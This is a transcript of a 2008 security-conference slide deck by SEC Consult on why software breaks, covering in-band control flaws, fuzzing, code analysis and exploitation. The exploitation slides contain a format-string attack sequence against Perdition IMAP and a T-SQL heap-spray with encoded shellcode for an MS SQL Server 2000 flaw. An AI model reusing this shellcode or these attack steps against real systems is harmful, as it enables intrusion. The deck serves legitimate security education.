Why software always breaks: From phone lines to...
Transcript of Why software always breaks: From phone lines to...
Why software always breaks: From phone lines to CPU threads
2008
Version: 1.0Autor: Bernhard MüllerResponsible: Bernhard MüllerDate: 31.10.2008Confidentiality: Public
About SEC Consult
• Leading information security advisor in Europe
• Sample customers (most customers are subject to NDA):
• Some vulnerabilities found by SEC Consult:
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved2
• MS05-037 (Internet Explorer JVIEW profiler vulnerability)
• CVE-2005-3591 (Macromedia Flash Player memory derefence)
• MS06-029 (MS Outlook Web Access script injection)
• CVE-2006-6690 (Typo3 shell command injection)
• CVE-2007-0450 (Apache Tomcat Directory Traversal)
• Regular talks at Blackhat and other security conferences
• More information at http://www.sec-consult.com/publikationen
Purpose about this talk
• Show you that most vulnerabilities in IT systems are essentially thesame
• Fast-forward tour on vulnerability discovery and exploitation
• Give you some links and tools for your own research
• „In band control“ vulnerabilities overview
Agenda
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved3
• „In band control“ vulnerabilities overview
• Input fuzzing
• Code- and binary analysis
• Exploitation and some examples
• Very broad definition: If user input is or can be mixed with control data(intentionally or unintentionally)
• When we can manipulate control data with our input, we can almostalways hijack the control flow
What do we mean by „in band control“
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved4
Internal logic
Data processingattacker input
Overlap
attackerownage
return, exit, crash, or whatever
Why is this possible
• Intentionally, often „security by obscurity“, or nobody thought about thesecurity implications
• Examples:
• Phone phreaking
○ Phone line: Data channel = control channel
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved5
• ARP Spoofing
○ Ethernet: Data channel = control channel
• Arbitrary object instantiation
○ Also „obfuscated“ parameter passing in serialized Java objects,…
○ Nowadays, often seen in Enterprise web applications
Why is this possible
• Unintentionally (for numerous reasons)
• Programming errors
• Missing input validation
char buf[256];strcpy(buf, userinput);
exec(„sendmail „ + $recipient + „ < email.txt“)
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved6
• Incomplete input validation
• Client side input validation
http://tomcat:8080/context/\../manager/html
Testing for vulnerabilities: Input Fuzzing (1)
• Simple method• Identify the interface and expected input
• Try lots of inputs (mutated, random)
• Automated tools are available• Generic protocol fuzzers
• Web application scanners
• Etc.
• Custom tools
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved7
• Custom tools• Use perl, python, etc. (something efficient!)
• Can be based on existing fuzzing frameworks
○ Scapy (kindof), Peach , Sulley
• Manual testing• Especially useful for web applications+
• Pros: Simple, fast and efficient
• Cons: Limited coverage
Testing for vulnerabilities: Input Fuzzing (2)
• Examples:• Very simple „fuzzing“ one the command-line
• More complex example: Fuzzing MS SQL extended server stored procedures
DEMO
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved8
• More complex example: Fuzzing MS SQL extended server stored procedures
1. Look up all existing stored procedures (don´t rely on documentation alone)
2. Find out which parameters are processed
3. Write everything down in a format that your fuzzing script will be able to read
4. Create fuzzing script (e.g. based on Sulley)
5. Run script (use some existing framework to monitor results)
6. Check and verify results
• Rule of thumb: Create any (im)possible input
• This is what we want so see:
Testing for vulnerabilities: Input Fuzzing (3)
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved
• … or any other deviation from normal behaviour…
9
• Monitoring results: Sulley web interface
Testing for vulnerabilities: Input Fuzzing (4)
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved10
Testing: In-depth application-/protocol analysis (1)
• Automatic code analysis:• Code Scanning
○ Free tools: rats,…
○ Custom tools: Perl, Python, grep,…
○ Commercial Tools: Fortify SCA, Ounce,…
• Manual code analysis or binary analysis:• Text editor (read the source), Eclipse
• Disassembler (binary analysis)
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved11
○ IDA Pro
○ OllyDBG
• Reverse Engineering• e.g. network protocol: proxy, network sniffer,…
Testing: In-depth application-/protocol analysis (2)
• Our former example (someformparser.cgi):
• Normally, it´s not that easy ☺
• Multiple ways of vulnerability analysis:
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved12
• Search for vulnerable functions and see if they are reached by user input
• Trace all user input and look if it reaches vulnerable code
• Do a complete, line by line audit, and cover the whole application
• A very complex topic obviously, we will cover that another time…
Exploitation (1)
• Problem: How do we decide if the condition is exploitable?
• Best way is a quick manual analysis (often based on experience)
• If the application / protocol is fundamentally flawed, no amount ofexternal validation and protection can help it• (Web-)application firewalls can be bypassed
• Runtime validation can be bypassed (PHP MAGIC_QUOTES etc.)
• Compiler measures can be bypassed (ASLR, Stack canaries,…)
• Intrusion prevention systems can be bypassed
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved13
• Intrusion prevention systems can be bypassed
• Most other things that someone invented can be bypassed (some are even ridiculous)
• Often, a very limited injection can be exploited• One byte memory write
• PHP file inclusion on a packet filtered and web firewalled system with most or all PHP safeguards acrivated
• See examples on the next pages• These are for binary applications, but the same principles apply to everything
Exploitation (2)
• Perdition IMAP Server: Limited format string vulnerability (2007)• One format identifier can be injected
• Can´t do things like „%.16705u%hn “
• Random stack etc. doesn´t make it any easier+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++168: static const char *__str_vwrite(io_t * io, const flag_t flag, 169: const size_t nargs, const char *fmt, va_list ap,170: int *bytes)171: {(...)186: fmt_args = 0;
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved14
186: fmt_args = 0;187: for (place = 0; fmt[place] != '\0'; place++) {188: if (fmt[place] == '%')189: fmt[place + 1] == '%' ? place++ : fmt_args++;190: }191: if (fmt_args != nargs) {(...)195: VANESSA_LOGGER_DEBUG_UNSAFE("nargs and fmt mismatch: "196: "%d args requested, %d args in format",197: nargs, fmt_args);198: return (NULL);199: }200: 201: *bytes = vsnprintf(__str_write_buf, STR_WRITE_BUF_LEN - 2, fmt, ap);+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploitation (3)
• Perdition IMAP Server: Limited format string vulnerability (2007)• Can be exploited by controlling program flow
1. read stack layout (to bypass ASLR)
2. put shellcode and .got address on the stack
3. overwrite .got entry for strncasecmp byte-by-byte (value is controlled by stringlength)
4. trigger call to strncasecmp
1. %13$08x -> Get shellcode address
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved15
Login()
0x08065370 .gotstrncasecmp
1. %13$08x -> Get shellcode address2. LOL LOGIN \x70\x53\x06\x08
(+Shellcode) -> Setup Stack3. LOL LOGIN AAA..AAA%.hn -> Write b14. LOL LOGIN AAA..AAA%.hn -> Write b25. LOL LOGIN AAA..AAA%.hn -> Write b36. LOL LOGIN AAA..AAA%.hn -> Write b4
7. LOL AUTHENTICATE X X -> Trigger call to strncasecmp()
Authenticate()
OWNED!
write
read
Exploitation (4)
• MS SQL Server 2000: Limited memory overwrite (0day)• SQL server crashes due to input validation error
○ Details will be published when a patch is out
• A single address can be overwritten with limited values
• Practically, we can only overwrite one DWORD with values between 0x0 and 0x1B58
• But that´s enough at least in Windows 2000
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved16
Exploitation (5)
• MS SQL Server 2000: Limited memory overwrite (0day)1. Spray the heap with NOPs & shellcode
SET @shell = @resPEB +
CHAR(43)+CHAR(201)+CHAR(131)+CHAR(233)+CHAR(221)+CHAR(217)+CHAR(238)+CHAR(217)+CHAR(116)+CHAR(36)+CHAR(244)+CHAR(91)+CHAR(129)+CHAR(115)+CHAR(19)+CHAR(187)+CHAR(124)+CHAR(50)+CHAR(131)+CHAR(131)+CHAR(235)+CHAR(252)+CHAR(226)+CHAR(244)+CHAR(71)+CHAR(148)+CHAR(118)+CHAR(131)+CHAR(187)+CHAR(124)+CHAR(185)+CHAR(198)+CHAR(135)+CHAR(247)+CHAR(78)+CHAR(134)+CHAR(195)+CHAR(125)+CHAR(221)+CHAR(8)+CHAR(244)+CHAR(100)+CHAR(185)+CHAR(220)+CHAR(155)+CHAR(125)+CHAR(217)+CHAR(202)+CHAR(48)+CHAR(72)+CHAR(185)+CHAR(130)+CHAR(85)+CHAR(77)+CHAR(242)+CHAR(26)+CHAR(23)+CHAR(248)+CHAR(242)+CHAR(247)+CHAR(188)+CHAR(189)+CHAR(248)+CHAR(142)+CHAR(186)+CHAR(190)+CHAR(217)+CHAR(119)+CHAR((128)+CHAR(40)+CHAR(22)+CHAR(135)+CHAR(206)+CHAR(153)+CHAR(185)+CHAR(220)+CHAR(159)+CHAR(125)+CHAR(217)+CHAR(229)+CHAR(48)+CHAR(112)+CHAR(121)+CHAR(8)+CHAR(228)+CHAR(96)+CHAR(51)+CHAR(104)+CHAR(48)+CHAR(96)+CHAR(185)+CHAR(130)+CHAR(80)+CHAR(245)+CHAR(110)+CHAR(167)+CHAR(191)+CHAR(191)+CHAR(3)+CHAR(67)+CHAR(223)+CHAR(247)+CHAR(114)+CHAR(179)+CHAR(62)+CHAR(188)+CHAR(74)+CHAR(143)+CHAR(48)+CHAR(60)+CHAR(62)+CHAR(8)+CHAR(203)+CHAR(96)+CHA
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved17
(114)+CHAR(179)+CHAR(62)+CHAR(188)+CHAR(74)+CHAR(143)+CHAR(48)+CHAR(60)+CHAR(62)+CHAR(8)+CHAR(203)+CHAR(96)+CHAR(159)+CHAR(8)+CHAR(211)+CHAR(116)+CHAR(217)+CHAR(138)+CHAR(48)+CHAR(252)+CHAR(130)+CHAR(131)+CHAR(187)+CHAR(124)+CHAR(185)+CHAR(235)+CHAR(135)+CHAR(35)+CHAR(3)+CHAR(117)+CHAR(219)+CHAR(42)+CHAR(187)+CHAR(123)+CHAR(56)+CHAR(188)+CHAR(73)+CHAR(211)+CHAR(211)+CHAR(140)+CHAR(184)+CHAR(135)+CHAR(228)+CHAR(20)+CHAR(170)+CHAR(125)+CHAR(49)+CHAR(114)+CHAR(101)+CHAR(124)+CHAR(92)+CHAR(31)+CHAR(83)+CHAR(239)+CHAR(216)+CHAR(82)+CHAR(87)+CHAR(251)+CHAR(222)+CHAR(124)+CHAR(50)+CHAR(131)
SET @counter = 0WHILE @counter < 7000BEGINSET @counter = @counter +1SET @sh000 = @sh000 + CHAR(144)SET @sh001 = @sh001 + CHAR(144)(….)ENDSET @sh000 = @sh000 + @shellSET @sh001 = @sh001 + @shell(...)
Exploitation (6)
• MS SQL Server 2000: Limited memory overwrite (0day)2. Overwrite MSW of FastPEBLockRoutine pointer (has to be restored by the shellcode!)
1. 0x7ffdf020: 3c 31 88 77 6d 31 88 772. 0x7ffdf020: 3c 31 97 19 00 00 88 77
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved18
HEAP: NOPS & Shellcode
Original FastPEBLockRoutine
0x1997313c
0x7788313c
FastPEBLockRoutine
The End
• References• “Internet Exploiter” by Skylined (first use of heap spraying)
http://www.edup.tudelft.nl/~bjwever/
• Perdition IMAP Proxy Format String Vulnerability (full advisory): http://www.sec-consult.com/files/20071031_perdition-imapd-fmtstr.txt
• Further reading• M. Sutton, A. Greene, and P. Amini, “Fuzzing: Brute Force Vulnerability Discovery”,
Addison-Wesley, 2007
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved19
Addison-Wesley, 2007
• Greg Hoglund and Gary McGraw, “Exploiting Software: How to Break Code”, Addison-Wesley, 2004
• Security Mailing lists
○ http://seclists.org/bugtraq/
○ http://seclists.org/fulldisclosure/
The End
• Recommended toolbox:• BURP Proxy (for testing web applications): http://portswigger.net/proxy/
• Scapy (for fuzzing network protocols): http://www.secdev.org/projects/scapy/
• Sulley fuzzing framework: http://www.fuzzing.org/fuzzing-software
• IDA Pro (good disassembler): http://www.datarescue.com/
• OllyDBG (good debugger): http://www.ollydbg.de/
• Metasploit (awesome shellcode generator): http://www.metasploit.com/
• Eclipse (for reading sourcecode): http://www.eclipse.org/
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved20
• Eclipse (for reading sourcecode): http://www.eclipse.org/
• Perl (for quick tools): http://www.perl.org/
• Python (for more complex tasks): http://www.python.org/
• MS Visual Studio: http://msdn.microsoft.com/en-us/vstudio/default.aspx
About SEC Consult
SEC Consult Unternehmensberatung GmbH
Mooslackengasse 17,
A-1190 Wien
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved21
A-1190 Wien
Tel: +43 / 1 8903043 0
Fax: +43 / 1 8903043 15
Email: [email protected]
http://www.sec-consult.com